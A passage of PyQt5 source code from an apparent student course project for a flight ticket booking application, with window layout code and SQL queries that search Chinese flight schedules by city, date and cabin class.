sizePolicy.setHeightForWidth(self.dateEdit.sizePolicy().hasHeightForWidth())
self.dateEdit.setSizePolicy(sizePolicy)
self.dateEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setMaximumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 12, 31), QtCore.QTime(23, 59, 59)))
self.dateEdit.setMinimumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setObjectName("dateEdit")
self.horizontalLayout_4.addWidget(self.dateEdit)
self.verticalLayout.addLayout(self.horizontalLayout_4)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_class = QtWidgets.QLabel(self.centralwidget)
self.label_class.setAlignment(QtCore.Qt.AlignCenter)
self.label_class.setObjectName("label_class")
self.horizontalLayout_5.addWidget(self.label_class)
self.comboBox_class = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_class.setObjectName("comboBox_class")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.horizontalLayout_5.addWidget(self.comboBox_class)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.Search = QtWidgets.QPushButton(self.centralwidget)
self.Search.setObjectName("Search")
self.verticalLayout.addWidget(self.Search)
self.pushbutton_buy = QtWidgets.QPushButton(self.centralwidget)
self.pushbutton_buy.setObjectName("pushbutton_buy")
self.verticalLayout.addWidget(self.pushbutton_buy)
self.horizontalLayout.addLayout(self.verticalLayout)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_departure_arrival = QtWidgets.QLabel(self.centralwidget)
self.label_departure_arrival.setObjectName("label_departure_arrival")
self.verticalLayout_2.addWidget(self.label_departure_arrival)
self.tableView_departure_arrival = QtWidgets.QTableView(self.centralwidget)
self.tableView_departure_arrival.setObjectName("tableView_departure_arrival")
self.verticalLayout_2.addWidget(self.tableView_departure_arrival)
self.label_departure_transit = QtWidgets.QLabel(self.centralwidget)
self.label_departure_transit.setObjectName("label_departure_transit")
self.verticalLayout_2.addWidget(self.label_departure_transit)
self.tableView_departure_transit = QtWidgets.QTableView(self.centralwidget)
self.tableView_departure_transit.setObjectName("tableView_departure_transit")
self.verticalLayout_2.addWidget(self.tableView_departure_transit)
self.label_transit_arrival = QtWidgets.QLabel(self.centralwidget)
self.label_transit_arrival.setObjectName("label_transit_arrival")
self.verticalLayout_2.addWidget(self.label_transit_arrival)
self.tableView_transit_destination = QtWidgets.QTableView(self.centralwidget)
self.tableView_transit_destination.setObjectName("tableview_transit_destination")
self.verticalLayout_2.addWidget(self.tableView_transit_destination)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1600, 21))
self.menubar.setObjectName("menubar")
self.menu_register_login = QtWidgets.QMenu(self.menubar)
self.menu_register_login.setObjectName("menu_register_login")
self.menu_function = QtWidgets.QMenu(self.menubar)
self.menu_function.setObjectName("menu_function")
self.menu_user = QtWidgets.QMenu(self.menu_function)
self.menu_user.setObjectName("menu_user")
self.menu_administrator = QtWidgets.QMenu(self.menu_function)
self.menu_administrator.setObjectName("menu_administrator")
MainWindow.setMenuBar(self.menubar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.toolBar_2 = QtWidgets.QToolBar(MainWindow)
self.toolBar_2.setObjectName("toolBar_2")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_2)
self.toolBar_3 = QtWidgets.QToolBar(MainWindow)
self.toolBar_3.setObjectName("toolBar_3")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_3)
self.statusBar = QtWidgets.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actionregister = QtWidgets.QAction(MainWindow)
self.actionregister.setObjectName("actionregister")
self.actionbuy = QtWidgets.QAction(MainWindow)
self.actionbuy.setObjectName("actionbuy")
self.action_buy = QtWidgets.QAction(MainWindow)
self.action_buy.setObjectName("action_buy")
self.actiond_my_ticket = QtWidgets.QAction(MainWindow)
self.actiond_my_ticket.setObjectName("actiond_my_ticket")
self.action_add_flight = QtWidgets.QAction(MainWindow)
self.action_add_flight.setObjectName("action_add_flight")
self.actionlogin = QtWidgets.QAction(MainWindow)
self.actionlogin.setObjectName("actionlogin")
self.menu_register_login.addAction(self.actionregister)
self.menu_register_login.addAction(self.actionlogin)
self.menu_user.addAction(self.action_buy)
self.menu_user.addAction(self.actiond_my_ticket)
self.menu_administrator.addAction(self.action_add_flight)
self.menu_function.addAction(self.menu_user.menuAction())
self.menu_function.addAction(self.menu_administrator.menuAction())
self.menubar.addAction(self.menu_register_login.menuAction())
self.menubar.addAction(self.menu_function.menuAction())
self.retranslateUi(MainWindow)
self.Search.clicked.connect(self.searchresult)
#self.login.clicked.connect(self.open_login)
self.pushbutton_buy.clicked.connect(self.jump_buy)
self.actionregister.triggered.connect(self.open_register)
self.actionlogin.triggered.connect(self.open_login)
# self.register_2.clicked.connect(self.open_register)
self.action_add_flight.triggered.connect(self.open_add_flight)
self.tableView_departure_arrival.clicked.connect(self.da)
self.tableView_departure_transit.clicked.connect(self.dt)
self.tableView_transit_destination.clicked.connect(self.ta)
self.tableView_departure_arrival.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tableView_transit_destination.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tableView_departure_transit.setSelectionBehavior(QAbstractItemView.SelectRows)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
# # def function_login(self):
# child_login, child_login_ui = login.Ui_Dialog.instantiation(login)
# child_login_ui.button_connect(child_login, self.login)
#
# # def function_register(self):
# child_register, child_register_ui = register.Ui_Dialog.instantiation(register)
# child_register_ui.button_connect(child_register, self.register_2)
def searchresult(self):
self.state = -1
query_flight_dt = QSqlQuery()
query_flight_dt.prepare('SELECT 航班编号 FROM 航班 '
'WHERE 航班.出发机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
'and 航班.经停机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)')
query_flight_dt.bindValue(":departure", self.comboBox_departure.currentText())
query_flight_dt.bindValue(":destination", self.comboBox_destination.currentText()) # 绑定占位符和相应的功能
query_flight_dt.exec_()
flight_dt = '('
while query_flight_dt.next():
flight_dt += "'" + query_flight_dt.value(0) + "'"
if query_flight_dt.next():
flight_dt += ","
query_flight_dt.previous()
flight_dt += ")" # flight : (A, B, ....)
self.model1 = QSqlTableModel()
self.tableView_departure_transit.setModel(self.model1)
self.model1.setTable('飞行计划安排')
self.model1.setFilter("航班编号 in %s and DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0 and [%s(开始-经停)剩余座位] > 0 "
% (flight_dt, self.dateEdit.date().toString("yyyy-MM-dd"), self.comboBox_class.currentText()))
self.model1.select()
self.tableView_departure_transit.hideColumn(4)
self.tableView_departure_transit.hideColumn(5)
self.tableView_departure_transit.hideColumn(6)
self.tableView_departure_transit.hideColumn(7)
self.tableView_departure_transit.hideColumn(8)
self.tableView_departure_transit.hideColumn(9)
self.tableView_departure_transit.hideColumn(10)
self.tableView_departure_transit.hideColumn(11)
self.tableView_departure_transit.hideColumn(15)
self.tableView_departure_transit.hideColumn(17)
self.tableView_departure_transit.hideColumn(18)
self.tableView_departure_transit.hideColumn(20)
self.tableView_departure_transit.hideColumn(21)
self.tableView_departure_transit.hideColumn(23)
if self.comboBox_class.currentText() == "头等舱":
self.tableView_departure_transit.hideColumn(16)
self.tableView_departure_transit.hideColumn(19)
self.tableView_departure_transit.hideColumn(12)
self.tableView_departure_transit.hideColumn(13)
elif self.comboBox_class.currentText() == "经济舱":
self.tableView_departure_transit.hideColumn(19)
self.tableView_departure_transit.hideColumn(22)
self.tableView_departure_transit.hideColumn(13)
self.tableView_departure_transit.hideColumn(14)
else :
self.tableView_departure_transit.hideColumn(16)
self.tableView_departure_transit.hideColumn(22)
self.tableView_departure_transit.hideColumn(12)
self.tableView_departure_transit.hideColumn(14)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(0,QHeaderView.Interactive)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(3, QHeaderView.Interactive)
self.tableView_departure_transit.setColumnWidth(0,90)
self.tableView_departure_transit.setColumnWidth(1,90)
self.tableView_departure_transit.setColumnWidth(2,200)
self.tableView_departure_transit.setColumnWidth(3,210)
self.tableView_departure_transit.show()
query_flight = QSqlQuery() # 新建QSqlQuery对象
query_flight.prepare('SELECT 航班编号 FROM 航班 '
'WHERE 航班.出发机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
'and 航班.到达机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)') # 输入SQL语句
query_flight.bindValue(":departure", self.comboBox_departure.currentText())
query_flight.bindValue(":destination", self.comboBox_destination.currentText()) # 绑定占位符和相应的功能
query_flight.exec_() # 执行
flight = "("
while query_flight.next():
flight += "'" + query_flight.value(0) + "'"
if query_flight.next():
flight += ","
query_flight.previous()
flight += ")" # flight : (A, B, ....)
self.model = QSqlTableModel() # 新建SQLTableModel 对象
self.tableView_departure_arrival.setModel(self.model) # 绑定到tableView对象上
self.model.setTable('飞行计划安排') # 相当于 from 语句
self.model.setFilter("航班编号 in %s and DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0 and [%s(开始-到达)剩余座位] > 0 "
% (flight, self.dateEdit.date().toString("yyyy-MM-dd"), self.comboBox_class.currentText())) # 相当于where语句
# self.model.setFilter("DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0" % (self.dateEdit.date().toString("yyyy-MM-dd") ))
# print(self.model.filter())
self.model.select() # 执行SQL select
self.tableView_departure_arrival.hideColumn(3)
self.tableView_departure_arrival.hideColumn(4)
self.tableView_departure_arrival.hideColumn(9)
self.tableView_departure_arrival.hideColumn(10)
self.tableView_departure_arrival.hideColumn(11)
self.tableView_departure_arrival.hideColumn(12)
self.tableView_departure_arrival.hideColumn(13)
self.tableView_departure_arrival.hideColumn(14)
self.tableView_departure_arrival.hideColumn(16)
self.tableView_departure_arrival.hideColumn(17)
self.tableView_departure_arrival.hideColumn(19)
self.tableView_departure_arrival.hideColumn(20)
self.tableView_departure_arrival.hideColumn(22)
self.tableView_departure_arrival.hideColumn(23)
if self.comboBox_class.currentText() == "头等舱":
self.tableView_departure_arrival.hideColumn(15)
self.tableView_departure_arrival.hideColumn(18)
self.tableView_departure_arrival.hideColumn(6)
self.tableView_departure_arrival.hideColumn(7)
elif self.comboBox_class.currentText() == "经济舱":
self.tableView_departure_arrival.hideColumn(21)
self.tableView_departure_arrival.hideColumn(18)
self.tableView_departure_arrival.hideColumn(7)
self.tableView_departure_arrival.hideColumn(8)
else :
self.tableView_departure_arrival.hideColumn(15)
self.tableView_departure_arrival.hideColumn(21)
self.tableView_departure_arrival.hideColumn(6)
self.tableView_departure_arrival.hideColumn(8)
# self.tableView_departure_arrival.setColumnWidth(3,200)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(0,QHeaderView.Interactive)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(5, QHeaderView.Interactive)
self.tableView_departure_arrival.setColumnWidth(0,90)
self.tableView_departure_arrival.setColumnWidth(1,90)
self.tableView_departure_arrival.setColumnWidth(2,200)
self.tableView_departure_arrival.setColumnWidth(5,190)
self.tableView_departure_arrival.show() # 显示
query_flight_ta = QSqlQuery()
query_flight_ta.prepare('SELECT 航班编号 FROM 航班 '
'WHERE 航班.经停机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
'and 航班.到达机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)')
query_flight_ta.bindValue(":departure", self.comboBox_departure.currentText())
query_flight_ta.bindValue(":destination", self.comboBox_destination.currentText()) # 绑定占位符和相应的功能
query_flight_ta.exec_()
flight_ta = '('
while query_flight_ta.next():
flight_ta += "'" + query_flight_ta.value(0) + "'"
if query_flight_ta.next():
flight_ta += ","
query_flight_ta.previous()
flight_ta += ")" # flight : (A, B, ....)
print (flight_ta)
self.model2 = QSqlTableModel()
self.tableView_transit_destination.setModel(self.model2)
self.model2.setTable('飞行计划安排')
self.model2.setFilter("航班编号 in %s and DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0 and [%s(经停-到达)剩余座位] > 0 "
% (flight_ta, self.dateEdit.date().toString("yyyy-MM-dd"),
self.comboBox_class.currentText()))
print(self.model2.filter())
self.model2.select()
self.tableView_transit_destination.hideColumn(2)
self.tableView_transit_destination.hideColumn(3)
self.tableView_transit_destination.hideColumn(6)
self.tableView_transit_destination.hideColumn(7)
self.tableView_transit_destination.hideColumn(8)
self.tableView_transit_destination.hideColumn(12)
self.tableView_transit_destination.hideColumn(13)
self.tableView_transit_destination.hideColumn(14)
self.tableView_transit_destination.hideColumn(15)
self.tableView_transit_destination.hideColumn(16)
self.tableView_transit_destination.hideColumn(18)
self.tableView_transit_destination.hideColumn(19)
self.tableView_transit_destination.hideColumn(21)
self.tableView_transit_destination.hideColumn(22)
if self.comboBox_class.currentText() == "头等舱":
self.tableView_transit_destination.hideColumn(17)
self.tableView_transit_destination.hideColumn(20)
self.tableView_transit_destination.hideColumn(9)
self.tableView_transit_destination.hideColumn(10)
elif self.comboBox_class.currentText() == "经济舱":
self.tableView_transit_destination.hideColumn(20)
self.tableView_transit_destination.hideColumn(23)
self.tableView_transit_destination.hideColumn(10)
self.tableView_transit_destination.hideColumn(11)
else:
self.tableView_transit_destination.hideColumn(17)
self.tableView_transit_destination.hideColumn(23)
self.tableView_transit_destination.hideColumn(9)
self.tableView_transit_destination.hideColumn(11)
#
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(4, QHeaderView.Interactive)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(5, QHeaderView.Interactive)
self.tableView_transit_destination.setColumnWidth(0, 90)
self.tableView_transit_destination.setColumnWidth(1, 90)
self.tableView_transit_destination.setColumnWidth(4, 230)
self.tableView_transit_destination.setColumnWidth(5, 190)
self.tableView_transit_destination.show()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_departure.setText(_translate("MainWindow", "Departure"))
self.comboBox_departure.setCurrentText(_translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_departure.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_departure.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_departure.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_departure.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_departure.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_departure.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_departure.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_departure.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_departure.setItemText(10, _translate("MainWindow", "南昌"))
self.label_destination.setText(_translate("MainWindow", "Destination"))
self.comboBox_destination.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_destination.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_destination.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_destination.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_destination.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_destination.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_destination.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_destination.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_destination.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_destination.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_destination.setItemText(10, _translate("MainWindow", "南昌"))
self.label_date.setText(_translate("MainWindow", "DATE"))
self.label_class.setText(_translate("MainWindow", "Class"))
self.comboBox_class.setItemText(0, _translate("MainWindow", "头等舱"))
self.comboBox_class.setItemText(1, _translate("MainWindow", "商务舱"))
self.comboBox_class.setItemText(2, _translate("MainWindow", "经济舱"))
self.Search.setText(_translate("MainWindow", "Search"))
self.pushbutton_buy.setText(_translate("MainWindow", "Buy"))
self.label_departure_arrival.setText(_translate("MainWindow", "出发 - 到达:"))
self.label_departure_transit.setText(_translate("MainWindow", "出发 - 经停:"))
self.label_transit_arrival.setText(_translate("MainWindow", "经停 - 到达:"))
self.menu_register_login.setTitle(_translate("MainWindow", "注册"))
self.menu_function.setTitle(_translate("MainWindow", "功能"))
self.menu_user.setTitle(_translate("MainWindow", "用户"))
self.menu_administrator.setTitle(_translate("MainWindow", "管理员"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
self.toolBar_2.setWindowTitle(_translate("MainWindow", "toolBar_2"))
self.toolBar_3.setWindowTitle(_translate("MainWindow", "toolBar_3"))
self.actionregister.setText(_translate("MainWindow", "用户注册"))
self.actionbuy.setText(_translate("MainWindow", "机票购买"))
self.action_buy.setText(_translate("MainWindow", "机票购买"))
self.actiond_my_ticket.setText(_translate("MainWindow", "我的机票"))
self.action_add_flight.setText(_translate("MainWindow", "添加航程"))
self.actionlogin.setText(_translate("MainWindow", "用户/管理员登录"))
def open_login(self):
login_window = Login_Window()
login_window.exec_()
self.username = login_window.username
self.power = login_window.power
def open_register(self):
register_window = Register_Window()
register_window.exec_()
def open_add_flight(self):
add_flight_window = Add_Flight_Window();
add_flight_window.exec_()
def jump_buy(self):
if (self.power < 1):
reply = QMessageBox.warning(self,
"消息框标题",
"请先登录后再购票!",
QMessageBox.Yes | QMessageBox.No)
elif (self.state == -1):
reply = QMessageBox.warning(self,
"消息框标题",
"请选取要买的票!",
QMessageBox.Yes | QMessageBox.No)
else:
jump_buy_window = Jump_Buy_Window()
jump_buy_window.state = self.state
jump_buy_window.num = self.num
jump_buy_window.username = self.username
jump_buy_window.exec_()
self.state = -1
def da(self):
self.state = 0
self.index = self.tableView_departure_arrival.currentIndex().row()
# print(self.index)
model = self.tableView_departure_arrival.model()
index = model.index(self.index,0)
self.num = model.data(index)
# print(data)
def dt(self):
self.state = 1
self.index = self.tableView_departure_transit.currentIndex().row()
# print(self.index)
model = self.tableView_departure_transit.model()
index = model.index(self.index,0)
self.num = model.data(index)
def ta(self):
self.state = 2
self.index = self.tableView_transit_destination.currentIndex().row()
# print(self.index)
model = self.tableView_transit_destination.model()
index = model.index(self.index,0)
self.num = model.data(index)
```
#### File: course-design/ui/search.py
```python
from PyQt5 import QtWidgets,QtGui,QtCore
from PyQt5.QtCore import *
from PyQt5.QtSql import *
import sys
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(567, 334)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_departure = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_departure.sizePolicy().hasHeightForWidth())
self.label_departure.setSizePolicy(sizePolicy)
self.label_departure.setAlignment(QtCore.Qt.AlignCenter)
self.label_departure.setObjectName("label_departure")
self.horizontalLayout_2.addWidget(self.label_departure)
self.comboBox_departure = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_departure.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_departure.sizePolicy().hasHeightForWidth())
self.comboBox_departure.setSizePolicy(sizePolicy)
self.comboBox_departure.setEditable(False)
self.comboBox_departure.setObjectName("comboBox_departure")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_departure)
self.label_destination = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_destination.sizePolicy().hasHeightForWidth())
self.label_destination.setSizePolicy(sizePolicy)
self.label_destination.setAlignment(QtCore.Qt.AlignCenter)
self.label_destination.setObjectName("label_destination")
self.horizontalLayout_2.addWidget(self.label_destination)
self.comboBox_destination = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_destination.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_destination.sizePolicy().hasHeightForWidth())
self.comboBox_destination.setSizePolicy(sizePolicy)
self.comboBox_destination.setEditable(False)
self.comboBox_destination.setObjectName("comboBox_destination")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_destination)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_date = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_date.sizePolicy().hasHeightForWidth())
self.label_date.setSizePolicy(sizePolicy)
self.label_date.setAlignment(QtCore.Qt.AlignCenter)
self.label_date.setObjectName("label_date")
self.horizontalLayout_4.addWidget(self.label_date)
self.dateEdit = QtWidgets.QDateEdit(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dateEdit.sizePolicy().hasHeightForWidth())
self.dateEdit.setSizePolicy(sizePolicy)
self.dateEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setMaximumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 12, 31), QtCore.QTime(23, 59, 59)))
self.dateEdit.setMinimumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setObjectName("dateEdit")
self.horizontalLayout_4.addWidget(self.dateEdit)
self.verticalLayout.addLayout(self.horizontalLayout_4)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_class = QtWidgets.QLabel(self.centralwidget)
self.label_class.setAlignment(QtCore.Qt.AlignCenter)
self.label_class.setObjectName("label_class")
self.horizontalLayout_5.addWidget(self.label_class)
self.comboBox_class = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_class.setObjectName("comboBox_class")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.horizontalLayout_5.addWidget(self.comboBox_class)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.Search = QtWidgets.QPushButton(self.centralwidget)
self.Search.setObjectName("Search")
self.verticalLayout.addWidget(self.Search)
self.horizontalLayout.addLayout(self.verticalLayout)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.horizontalLayout.addItem(spacerItem)
self.output_search = QtWidgets.QTableView(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.output_search.sizePolicy().hasHeightForWidth())
self.output_search.setSizePolicy(sizePolicy)
self.output_search.setObjectName("output_search")
self.horizontalLayout.addWidget(self.output_search)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 567, 21))
self.menubar.setObjectName("menubar")
self.menu = QtWidgets.QMenu(self.menubar)
self.menu.setObjectName("menu")
self.menu_2 = QtWidgets.QMenu(self.menubar)
self.menu_2.setObjectName("menu_2")
self.menu_3 = QtWidgets.QMenu(self.menu_2)
self.menu_3.setObjectName("menu_3")
self.menu_4 = QtWidgets.QMenu(self.menu_2)
self.menu_4.setObjectName("menu_4")
MainWindow.setMenuBar(self.menubar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.toolBar_2 = QtWidgets.QToolBar(MainWindow)
self.toolBar_2.setObjectName("toolBar_2")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_2)
self.toolBar_3 = QtWidgets.QToolBar(MainWindow)
self.toolBar_3.setObjectName("toolBar_3")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_3)
self.statusBar = QtWidgets.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actionregister = QtWidgets.QAction(MainWindow)
self.actionregister.setObjectName("actionregister")
self.actionbuy = QtWidgets.QAction(MainWindow)
self.actionbuy.setObjectName("actionbuy")
self.action1 = QtWidgets.QAction(MainWindow)
self.action1.setObjectName("action1")
self.actionds = QtWidgets.QAction(MainWindow)
self.actionds.setObjectName("actionds")
self.actionkj = QtWidgets.QAction(MainWindow)
self.actionkj.setObjectName("actionkj")
self.menu.addAction(self.actionregister)
self.menu_3.addAction(self.action1)
self.menu_3.addAction(self.actionds)
self.menu_4.addAction(self.actionkj)
self.menu_2.addAction(self.menu_3.menuAction())
self.menu_2.addAction(self.menu_4.menuAction())
self.menubar.addAction(self.menu.menuAction())
self.menubar.addAction(self.menu_2.menuAction())
self.retranslateUi(MainWindow)
self.Search.clicked.connect(self.searchresult)
self.login.clicked.connect(self.function_login)
self.register_2.clicked.connect(self.function_register)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def function_login(self):
child_login, child_login_ui = login.Ui_Dialog.instantiation(login)
child_login_ui.button_connect(child_login, main_ui.login)
def function_register(self):
child_register, child_register_ui = register.Ui_Dialog.instantiation(register)
child_register_ui.button_connect(child_register, main_ui.register_2)
def searchresult(self):
# query_departure = QSqlQuery()
# query_departure.prepare("SELECT 机场代码 FROM 机场 where 所在城市 = :departure")
# query_departure.bindValue(":departure", self.comboBox_departure.currentText())
# query_departure.exec_()
# list_departure = list()
# while query_departure.next():
# print(query_departure.value(0))
#
# query_destination = QSqlQuery()
# query_destination.prepare("SELECT 机场代码 FROM 机场 where 所在城市 = :destination")
# query_destination.bindValue(":destination", self.comboBox_destination.currentText())
# query_destination.exec_()
# list_destination = list()
# while query_destination.next():
